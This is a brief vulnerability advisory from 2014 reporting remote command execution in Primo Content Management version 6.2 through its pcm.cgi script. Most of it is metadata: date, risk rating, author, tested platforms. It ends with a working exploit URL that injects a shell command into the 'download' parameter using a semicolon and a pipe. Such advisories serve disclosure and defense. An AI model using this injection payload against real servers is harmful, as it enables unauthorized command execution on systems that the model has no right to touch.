[+] Remote Comand Execution on Primo Content Management (cms) [+] Date: 29/03/2014 [+] Risk: High [+] Author: Felipe Andrian Peixoto [+] Contact: felipe_andrian@hotmail.com [+] Vendor Homepage: http://www.primo-corp.com.my/ [+] Tested on Windows 7 and Linux [+] Vulnerable File: pcm.cgi [+] Version : Version 6.2 [+] Exploit: http://host/cgi-bin/pcm.cgi?download=;id|